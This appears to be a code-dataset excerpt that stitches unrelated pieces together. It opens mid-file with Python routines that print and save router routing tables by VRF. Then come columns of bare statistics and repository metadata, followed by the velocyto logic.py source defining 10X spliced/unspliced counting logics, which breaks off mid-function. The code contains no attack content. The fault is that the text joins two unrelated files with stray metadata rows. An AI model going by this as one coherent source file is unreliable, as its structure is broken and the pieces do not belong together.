    dict mapping vrf_id -> list of route rows, not a list.)

    Row fields:
    row[0] decimal of destination ipaddr.
    row[1] destination ipaddr.
    row[2] [distance/metric]
    row[3] next hop.
    row[4] elapsed time.
    row[5] Output interface.
    row[6] Codes.
    """
    for key, value in table.items():
        if enable_sort:
            # NOTE: sorts the rows in place, mutating the caller's table.
            value.sort()
        print("##----------------------------------------------------------------------##\n"
              "## {0}\n"
              "## ModelName = {1}\n" \
              "## vrf = {2}\n"
              "## {3} records\n"
              "##----------------------------------------------------------------------##"
              .format(filename_path, modelName, key, len(value)))
        # print("{0:20}{1:14}{2:20}{3:10}{4:24}{5}".format("Destination", "Metric", "NextHop", "Expire", "Interface", "Protocol"))
        print("{0:20}{1:14}{2:20}{3:24}{4}".format("Destination", "Metric", "NextHop", "Interface", "Protocol"))
        for row in value:
            # Sanity check: a well-formed row carries a "/" prefix in row[1] or
            # row[2], or "via" in row[3]; anything else is flagged (but still printed).
            if not "/" in row[1] and not "/" in row[2] and row[3] != "via":
                print("Format Error!!!")
                # print(row)
            # print("{0: <12}{1:20}{2:14}{3:20}{4:10}{5:24}{6}".format(row[0], row[1], row[2], row[3], row[4], row[5], row[6]))
            # print("{0:20}{1:14}{2:20}{3:10}{4:24}{5}".format(row[1], row[2], row[3], row[4], row[5], row[6]))
            print("{0:20}{1:14}{2:20}{3:24}{4}".format(row[1], row[2], row[3], row[5], row[6]))
        print()
def save_contents(filename_path: str, target_directory: str, target_command: str, contents: List[str]):
    """Save the raw command output under target_directory/<prefix>/.

    <prefix> is the part of the input file name before its last "_"; the saved
    file name embeds the (sanitized) command. Calls exit(0) when the input file
    name lacks an "_" or an extension, matching the original behavior.

    :param filename_path: original capture file path (its basename is reused)
    :param target_directory: root directory to save under (created if missing)
    :param target_command: CLI command the contents belong to
    :param contents: lines to write
    """
    # remove prohibited characters.
    target_command = remove_prohibited_characters(target_command).replace(" ", "_")
    original_filename = filename_path.split("/")[-1]
    pos_bar = original_filename.rfind("_")
    if pos_bar < 0:
        print("save_contents() rfind(\"_\") error!! ... {0}".format(original_filename))
        exit(0)
    dirname = target_directory + "/" + original_filename[:pos_bar]
    if not os.path.exists(dirname):
        os.makedirs(dirname)
    pos_extension = original_filename.rfind(".")
    if pos_extension < 0:
        print("save_contents() rfind(\".\") error!! ... {0}".format(original_filename))
        exit(0)
    newfilename_path = dirname + "/" + original_filename[:pos_extension] + "_" + target_command + original_filename[pos_extension:]
    newfilename_path = newfilename_path.replace("//", "/")
    # BUG FIX: the original called "f.close" without parentheses, so the file
    # was never explicitly closed; the context manager guarantees it.
    with open(newfilename_path, mode="wt") as f:
        f.writelines(contents)
    print("{0} was saved.".format(newfilename_path))
def save_table(modelName: str, filename_path: str, table: Dict[str, List[List[str]]], target_directory: str, enable_sort: bool):
    """
    save table

    Writes one text file per vrf under target_directory/<prefix>/, where
    <prefix> is the part of the input file name before its last "_".
    (Annotation fixed: the code iterates ``table.items()``, so *table* is a
    dict mapping vrf_id -> list of route rows; see print_table's docstring
    in this module for the row layout.) Calls exit(0) on malformed rows,
    bad file names, or write errors, matching the original behavior.
    """
    for key, value in table.items():
        if enable_sort:
            # NOTE: sorts the rows in place, mutating the caller's table.
            value.sort()
        # Banner + column header for this vrf.
        resultStr = "##----------------------------------------------------------------------##\n" \
                    "## {0}\n" \
                    "## ModelName = {1}\n" \
                    "## vrf = {2}\n" \
                    "## {3} records\n" \
                    "##----------------------------------------------------------------------##\n" \
                    .format(filename_path, modelName, key, len(value))
        resultStr += "{0:20}{1:14}{2:20}{3:24}{4}\n".format("Destination", "Metric", "NextHop", "Interface", "Protocol")
        for row in value:
            # A well-formed row carries a "/" prefix in row[1] or row[2], or "via" in row[3].
            if not "/" in row[1] and not "/" in row[2] and row[3] != "via":
                print("Format Error!!!")
                exit(0)
            resultStr += "{0:20}{1:14}{2:20}{3:24}{4}\n".format(row[1], row[2], row[3], row[5], row[6])
        original_filename = filename_path.split("/")[-1]
        pos_bar = original_filename.rfind("_")
        if pos_bar < 0:
            print("save_table() rfind(\"_\") error!! ... {0}".format(original_filename))
            exit(0)
        dirname = target_directory + "/" + original_filename[:pos_bar]
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        pos_extension = original_filename.rfind(".")
        if pos_extension < 0:
            print("save_table() rfind(\".\") error!! ... {0}".format(original_filename))
            exit(0)
        newfilename_path = dirname + "/" + original_filename[:pos_extension] + "_vrf_" + key + original_filename[pos_extension:]
        newfilename_path = newfilename_path.replace("//", "/")
        try:
            # BUG FIX: the original called "f.close" without parentheses, so the
            # file handle was never explicitly closed; "with" guarantees cleanup.
            with open(newfilename_path, mode="wt") as f:
                f.write(resultStr)
            print("table[{0}] was saved to {1}".format(key, newfilename_path))
        except Exception as e:
            print("////////////////////////////////\n"
                  "Error!!!\n"
                  "////////////////////////////////\n"
                  "{0}\n\n".format(e))
            print("newfilename_path = {0}".format(newfilename_path))
            print("resultStr = \n{0}".format(resultStr))
            exit(0)
def remove_prohibited_characters(prompt_preStr: str) -> str:
    """
    Remove prohibited characters.

    Strips every character that must not appear in generated file names.
    """
    # Map each prohibited character to None and drop them all in a single pass.
    forbidden = "[]>#%$:;~*."
    return prompt_preStr.translate(str.maketrans("", "", forbidden))
| 44.164384
| 162
| 0.613368
| 1,584
| 12,896
| 4.729798
| 0.094697
| 0.171783
| 0.210224
| 0.055793
| 0.811399
| 0.792579
| 0.778297
| 0.745996
| 0.725841
| 0.681794
| 0
| 0.026777
| 0.238368
| 12,896
| 291
| 163
| 44.316151
| 0.736001
| 0.142215
| 0
| 0.585106
| 0
| 0
| 0.138757
| 0.044059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031915
| false
| 0
| 0.021277
| 0
| 0.138298
| 0.170213
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66df0b7898c462edb013846fc2caa343bcd0ac4a
| 63,746
|
py
|
Python
|
velocyto/logic.py
|
jamestwebber/velocyto.py
|
beba566bf82a9cb4024ed913fd3feb7bfde956a5
|
[
"BSD-2-Clause"
] | null | null | null |
velocyto/logic.py
|
jamestwebber/velocyto.py
|
beba566bf82a9cb4024ed913fd3feb7bfde956a5
|
[
"BSD-2-Clause"
] | null | null | null |
velocyto/logic.py
|
jamestwebber/velocyto.py
|
beba566bf82a9cb4024ed913fd3feb7bfde956a5
|
[
"BSD-2-Clause"
] | null | null | null |
from typing import *
import velocyto as vcy
import numpy as np
import abc
class Logic(metaclass=abc.ABCMeta):
    """Base class from which all the counting logics should inherit."""

    def __init__(self) -> None:
        # Human-readable identifier of the logic; subclasses override it.
        self.name = "Logic"

    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        # The base logic declares no output layers.
        return []

    @property
    def stranded(self) -> bool:
        # NOTE(review): presumably indicates whether the logic assumes a
        # stranded protocol -- confirm against the callers of this flag.
        return True

    @property
    def perform_validation_markup(self) -> bool:
        return True

    @property
    def accept_discordant(self) -> bool:
        return False

    @abc.abstractmethod  # This needs to be overridden
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> Union[None, int]:
        """This method will have to contain the core operations of the logic to attribute a molecule to one of the categories

        Arguments
        ---------
        molitem: vcy.Molitem
            The :py:class:`vcy.Molitem` object to be considered by the logic
        cell_bcidx: int
            The cell index in the memory buffers below
        dict_layers_columns: Dict[str, np.ndarray]
            A dictionary mapping the name of a layer with the memory buffer that will be saved in the loom file after counting
        geneid2ix: Dict[str, int]
            Dictionary containing the Accession of the genes mapping to its column index position

        Returns
        -------
        Nothing but it adds the molecule to the appropriate layer (or does not count at all)
        """
        # NOTE I need to generalize this to any set of layers
        return None
class Permissive10X(Logic):
    """Permissive logic for the 10X Genomics chemistry.

    This logic differs from the other 10x logics because:
    - singletons falling in non-validated introns are COUNTED UNSPLICED
    - singletons falling in validated introns are COUNTED UNSPLICED
    - non-singletons supported by non-validated introns are COUNTED UNSPLICED
    - non-singletons supported by validated introns are COUNTED UNSPLICED
    """
    def __init__(self) -> None:
        self.name = "Permissive10X"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous"]
    @property
    def stranded(self) -> bool:
        return True
    @property
    def perform_validation_markup(self) -> bool:
        return True
    @property
    def accept_discordant(self) -> bool:
        return False
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> int:
        """Attribute the molecule to a layer, returning a status code.

        Returns 0 when the molecule was counted, 1 when skipped because several
        genes are compatible, 2 when no transcript model is compatible, and 3
        for the rare triple-ambiguity case (still counted as ambiguous).
        """
        # NOTE This can be simplified quite a bit, without loss of accuracy!
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        # The hits are not compatible with any annotated transcript model
        if len(molitem.mappings_record) == 0:
            return 2
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes
            # NOTE(review): when several genes are compatible this condition is False and the
            # method falls through, implicitly returning None despite the -> int annotation — confirm
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                gene_check: Set[str] = set()
                # Molecule-level flags, aggregated over all compatible transcript models
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyintron_and_valid_model = 0
                has_valid_mixed_model = 0
                has_invalid_mixed_model = 0
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-transcript-model evidence flags
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0
                    has_validated_intron = 0
                    has_exin_intron_span = 0
                    has_non3prime = 0
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            if segment_match.feature.is_validated:
                                has_validated_intron = 1
                                # Detect reads spanning an exon-intron boundary on either side
                                if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                    downstream_exon = segment_match.feature.get_downstream_exon()
                                    if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                                if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                    upstream_exon = segment_match.feature.get_upstream_exon()
                                    if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if not segment_match.feature.is_last_3prime:
                                has_non3prime = 1
                            if segment_match.is_spliced:
                                has_exseg_with_spliced_flag = 1
                    # Fold the per-model evidence into the molecule-level flags
                    if has_validated_intron and not has_exons:
                        has_onlyintron_and_valid_model = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
                        has_invalid_mixed_model = 1
                        has_mixed_model = 1
                    if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
                        has_valid_mixed_model = 1
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                if multi_gene:
                    # Many genes are compatible with the observation, do not count
                    return 1
                else:
                    if not len(molitem.mappings_record):
                        # No gene is compatible with the observation, do not count
                        return 2
                    else:
                        # NOTE(review): gene_ix below uses transcript_model/segments_list from the
                        # last loop iteration; valid because all models share one geneid here
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return 0
                        if has_only_span_exin_model:
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return 0
                        if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return 0
                            else:
                                # Non-singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return 0
                        if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in non-validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return 0
                            else:
                                # Non-singleton in non-validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return 0
                        if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant. Count anyways
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return 0
                        if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return 0
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return 0
                        if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
                            # Very rare, at least in 10X.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1  # this was ambiguous in a previous version
                            return 0
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return 0
                        if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return 3
class Intermediate10X(Logic):
    """Intermediate logic for the 10X Genomics chemistry.

    This differs from the other 10x logics because:
    - singletons falling in non-validated introns are DISCARDED
    - singletons falling in validated introns are COUNTED UNSPLICED
    - non-singletons supported by non-validated introns are COUNTED UNSPLICED
    - non-singletons supported by validated introns are COUNTED UNSPLICED
    """
    def __init__(self) -> None:
        self.name = "Intermediate10X"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous"]
    @property
    def stranded(self) -> bool:
        return True
    @property
    def perform_validation_markup(self) -> bool:
        return True
    @property
    def accept_discordant(self) -> bool:
        return False
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
        """Attribute the molecule to a layer by incrementing the buffers in place.

        Returns None in all cases; counting happens via side effects on the
        spliced/unspliced/ambiguous layer buffers.
        """
        # NOTE This can be simplified quite a bit, without loss of accuracy!
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        # The hits are not compatible with any annotated transcript model
        if len(molitem.mappings_record) == 0:
            return
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                gene_check: Set[str] = set()
                # Molecule-level flags, aggregated over all compatible transcript models
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyintron_and_valid_model = 0
                has_valid_mixed_model = 0
                has_invalid_mixed_model = 0
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-transcript-model evidence flags
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0
                    has_validated_intron = 0
                    has_exin_intron_span = 0
                    has_non3prime = 0
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            if segment_match.feature.is_validated:
                                has_validated_intron = 1
                                # Detect reads spanning an exon-intron boundary on either side
                                if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                    downstream_exon = segment_match.feature.get_downstream_exon()
                                    if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                                if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                    upstream_exon = segment_match.feature.get_upstream_exon()
                                    if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if not segment_match.feature.is_last_3prime:
                                has_non3prime = 1
                            if segment_match.is_spliced:
                                has_exseg_with_spliced_flag = 1
                    # Fold the per-model evidence into the molecule-level flags
                    if has_validated_intron and not has_exons:
                        has_onlyintron_and_valid_model = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
                        has_invalid_mixed_model = 1
                        has_mixed_model = 1
                    if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
                        has_valid_mixed_model = 1
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                if multi_gene:
                    # many genes are compatible with the observation, do not count
                    return
                else:
                    if not len(molitem.mappings_record):
                        # no gene is compatible with the observation, do not count
                        return
                    else:
                        # NOTE(review): gene_ix below uses transcript_model/segments_list from the
                        # last loop iteration; valid because all models share one geneid here
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_only_span_exin_model:
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                            else:
                                # Non singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                        if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in non-validated intron, discarded by this logic
                                return
                            else:
                                # Non-singleton in non-validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                        if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
                            return
                        if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
class ValidatedIntrons10X(Logic):
    """ValidatedIntrons logic for the 10X Genomics chemistry.

    This differs from the other 10x logics because:
    - singletons falling in non-validated introns are DISCARDED
    - singletons falling in validated introns are COUNTED UNSPLICED
    - non-singletons supported by non-validated introns are DISCARDED
    - non-singletons supported by validated introns are COUNTED UNSPLICED
    """
    def __init__(self) -> None:
        self.name = "ValidatedIntrons10X"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous"]
    @property
    def stranded(self) -> bool:
        return True
    @property
    def perform_validation_markup(self) -> bool:
        return True
    @property
    def accept_discordant(self) -> bool:
        return False
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
        """Attribute the molecule to a layer by incrementing the buffers in place.

        Returns None in all cases; counting happens via side effects on the
        spliced/unspliced/ambiguous layer buffers.
        """
        # NOTE This can be simplified quite a bit, without loss of accuracy!
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        # The hits are not compatible with any annotated transcript model
        if len(molitem.mappings_record) == 0:
            return
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                gene_check: Set[str] = set()
                # Molecule-level flags, aggregated over all compatible transcript models
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyintron_and_valid_model = 0
                has_valid_mixed_model = 0
                has_invalid_mixed_model = 0
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-transcript-model evidence flags
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0
                    has_validated_intron = 0
                    has_exin_intron_span = 0
                    has_non3prime = 0
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            if segment_match.feature.is_validated:
                                has_validated_intron = 1
                                # Detect reads spanning an exon-intron boundary on either side
                                if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                    downstream_exon = segment_match.feature.get_downstream_exon()
                                    if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                                if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                    upstream_exon = segment_match.feature.get_upstream_exon()
                                    if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if not segment_match.feature.is_last_3prime:
                                has_non3prime = 1
                            if segment_match.is_spliced:
                                has_exseg_with_spliced_flag = 1
                    # Fold the per-model evidence into the molecule-level flags
                    if has_validated_intron and not has_exons:
                        has_onlyintron_and_valid_model = 1
                    if has_introns and not has_exons:
                        has_onlyintron_model = 1
                    if has_exons and not has_introns:
                        has_onlyexo_model = 1
                    if has_exons and has_introns and not has_validated_intron and not has_exin_intron_span:
                        has_invalid_mixed_model = 1
                        has_mixed_model = 1
                    if has_exons and has_introns and has_validated_intron and not has_exin_intron_span:
                        has_valid_mixed_model = 1
                        has_mixed_model = 1
                    if not has_exin_intron_span:
                        has_only_span_exin_model = 0
                if multi_gene:
                    # many genes are compatible with the observation, do not count
                    return
                else:
                    if not len(molitem.mappings_record):
                        # no gene is compatible with the observation, do not count
                        return
                    else:
                        # NOTE(review): gene_ix below uses transcript_model/segments_list from the
                        # last loop iteration; valid because all models share one geneid here
                        if has_onlyexo_model and not has_onlyintron_model and not has_mixed_model:
                            # More common situation, normal exonic read, count as spliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            spliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_only_span_exin_model:
                            # All the compatible transcript models have spanning exon-intron boundaries, count unspliced
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                            else:
                                # Non singleton in validated intron
                                gene_ix = geneid2ix[transcript_model.geneid]
                                unspliced[gene_ix, cell_bcidx] += 1
                                return
                        if has_onlyintron_model and not has_onlyintron_and_valid_model and not has_mixed_model and not has_onlyexo_model:
                            if len(segments_list) == 1:
                                # Singleton in non-validated intron, discarded by this logic
                                return
                            else:
                                # Non-singleton in non-validated intron, discarded by this logic
                                return
                        if has_invalid_mixed_model and not has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Not validated and mapping to exon and introns, happens rarely in 10X / irrelevant.
                            return
                        if has_valid_mixed_model and not has_onlyintron_model and not has_onlyexo_model and not has_only_span_exin_model:
                            # Validated and mapping to exon and introns, happens rarely in 10X. Count as unspliced.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            unspliced[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and not has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping, most common case! Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and not has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if not has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Count ambiguous
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
                        if has_onlyintron_model and has_onlyexo_model and has_mixed_model:
                            # Ambiguity among the transcript models compatible with the mapping. Very rare.
                            gene_ix = geneid2ix[transcript_model.geneid]
                            ambiguous[gene_ix, cell_bcidx] += 1
                            return
class Stricter10X(Logic):
    """Stricter logic for the 10X Genomics chemistry.

    This differs from the other 10x logics because:
    - singletons falling in non-validated introns are DISCARDED
    - singletons falling in validated introns are DISCARDED
    - non-singletons supported by non-validated introns are DISCARDED
    - non-singletons supported by validated introns are COUNTED UNSPLICED
    """
    def __init__(self) -> None:
        self.name = "Stricter10X"
    @property
    def layers(self) -> List[str]:  # This should be overridden if a different set of layers is desired
        return ["spliced", "unspliced", "ambiguous"]
    @property
    def stranded(self) -> bool:
        return True
    @property
    def perform_validation_markup(self) -> bool:
        return True
    @property
    def accept_discordant(self) -> bool:
        # Added for consistency with the sibling 10X logics; same value as the
        # Logic base-class default, so behavior is unchanged.
        return False
    def count(self, molitem: vcy.Molitem, cell_bcidx: int, dict_layers_columns: Dict[str, np.ndarray], geneid2ix: Dict[str, int]) -> None:
        """Attribute the molecule to a layer by incrementing the buffers in place.

        Returns None in all cases; counting happens via side effects on the
        spliced/unspliced/ambiguous layer buffers.
        """
        # NOTE This can be simplified quite a bit, without loss of accuracy!
        spliced = dict_layers_columns["spliced"]
        unspliced = dict_layers_columns["unspliced"]
        ambiguous = dict_layers_columns["ambiguous"]
        # The hits are not compatible with any annotated transcript model
        if len(molitem.mappings_record) == 0:
            return
        # Compatible with one or more transcript models:
        else:
            # Check that there are not different possible genes
            if len(set(i.geneid for i in molitem.mappings_record.keys())) == 1:
                gene_check: Set[str] = set()
                # Molecule-level flags, aggregated over all compatible transcript models
                has_onlyintron_model = 0
                has_only_span_exin_model = 1
                has_onlyintron_and_valid_model = 0
                has_valid_mixed_model = 0
                has_invalid_mixed_model = 0
                has_onlyexo_model = 0
                has_mixed_model = 0
                multi_gene = 0
                for transcript_model, segments_list in molitem.mappings_record.items():
                    gene_check.add(transcript_model.geneid)
                    if len(gene_check) > 1:
                        multi_gene = 1
                    # Per-transcript-model evidence flags
                    has_introns = 0
                    has_exons = 0
                    has_exseg_with_spliced_flag = 0
                    has_validated_intron = 0
                    has_exin_intron_span = 0
                    has_non3prime = 0
                    for segment_match in segments_list:
                        if segment_match.maps_to_intron:
                            has_introns = 1
                            if segment_match.feature.is_validated:
                                has_validated_intron = 1
                                # Detect reads spanning an exon-intron boundary on either side
                                if segment_match.feature.end_overlaps_with_part_of(segment_match.segment):
                                    downstream_exon = segment_match.feature.get_downstream_exon()
                                    if downstream_exon.start_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                                if segment_match.feature.start_overlaps_with_part_of(segment_match.segment):
                                    upstream_exon = segment_match.feature.get_upstream_exon()
                                    if upstream_exon.end_overlaps_with_part_of(segment_match.segment):
                                        has_exin_intron_span = 1
                        elif segment_match.maps_to_exon:
                            has_exons = 1
                            if not segment_match.feature.is_last_3prime:
                                has_non3prime = 1
                            if segment_match.is_spliced:
